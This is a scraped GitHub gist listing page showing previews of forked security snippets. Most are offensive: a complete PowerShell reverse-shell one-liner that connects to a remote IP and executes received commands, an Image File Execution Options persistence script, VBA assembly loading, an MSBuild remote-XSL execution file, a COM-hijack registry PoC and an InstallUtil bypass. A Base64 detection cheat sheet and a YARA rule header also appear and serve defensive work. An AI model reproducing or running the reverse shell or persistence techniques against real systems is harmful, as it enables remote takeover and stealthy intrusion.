MITRE ATT4CK - T1132 - Data Encoding
| Base64 Code | Decoded (. = 0x00) | Description | MITRE ID |
|---|---|---|---|
| JAB | $. | Variable declaration (UTF-16) | T1086 |
| TVq | MZ | MZ header | T1001 |
| UEs | PK | ZIP, Office documents | T1001 |
| SUVY | IEX | PowerShell Invoke Expression | T1086 |
ashr ashr
ashr
/ ImageFileExecutionOptions.ps1
Created
January 13, 2020 13:02
— forked from netbiosX/ImageFileExecutionOptions.ps1
Image File Execution Options Injection - Persistence Technique
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ImageFileExecutionOptions v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Image File Execution Options Injection Persistence Technique | |
| # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
| function Persist-Debugger |
ashr
/ Base64_CheatSheet.md
Created
October 24, 2019 21:31
— forked from Neo23x0/Base64_CheatSheet.md
Spot Malicious Base64 Encoded Code
ashr
/ forward.sh
Created
October 1, 2019 10:21
— forked from leonjza/forward.sh
Forward a new host port to a running docker container.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Add a firewall NAT rule to expose a port open in a docker container, on a host. | |
| # | |
| # This is only really useful if the container is already running, and you don't | |
| # want to/can't shut it down, but need a new incoming port open. | |
| # | |
| # Requires `jq` for parsing docker container information. | |
| # | |
| # 2019 @leonjza |
ashr
/ mscorlib_load_assembly.vba
Created
September 30, 2019 19:03
— forked from monoxgas/mscorlib_load_assembly.vba
VBA code for calling Assembly.Load using raw vtable lookups for the IUnknown
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <string.h> | |
| /* | |
| $ gcc fbmon.c | |
| $ ./a.out | |
| *** stack smashing detected ***: <unknown> terminated | |
| Aborted (core dumped) |
ashr
/ powershell_reverse_shell.ps1
Created
July 6, 2019 08:10
— forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> | |
| <Target Name="Example"> | |
| <ItemGroup> | |
| <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" /> | |
| </ItemGroup> | |
| <PropertyGroup> | |
| <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile> | |
| </PropertyGroup> | |
| <XslTransformation | |
| OutputPaths="output.%(XmlFiles.FileName).html" |
ashr
/ PoC.reg
Last active
June 9, 2019 13:57
— forked from homjxi0e/PoC.reg
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prncnfg.vbs /?
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | |
| @="" | |
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
ashr
/ iddqd.yar
Created
May 14, 2019 13:35
— forked from Neo23x0/iddqd.yar
IDDQD - Godmode YARA Rule
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| _____ __ __ ___ __ | |
| / ___/__ ___/ / / |/ /__ ___/ /__ | |
| / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_) | |
| \___/\___/\_,_/_/_/__/_/\___/\_,_/\__/ | |
| \ \/ / _ | / _ \/ _ | / _ \__ __/ /__ | |
| \ / __ |/ , _/ __ | / , _/ // / / -_) | |
| /_/_/ |_/_/|_/_/ |_| /_/|_|\_,_/_/\__/ | |
| Florian Roth - v0.1 May 2019 |
ashr
/ gethelp.cs
Created
May 14, 2019 12:00
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |